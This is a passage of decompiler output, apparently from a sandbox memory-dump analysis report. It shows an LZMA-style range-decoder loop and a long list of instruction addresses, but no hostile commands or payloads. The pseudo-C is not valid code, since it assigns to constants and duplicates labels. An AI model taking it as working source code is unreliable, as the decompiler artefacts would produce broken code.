														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407023
0x0040702a
0x00407030
0x00407036
0x00407048
0x0040704e
0x00407053
0x00000000
0x00407004
0x0040700a
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407002

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
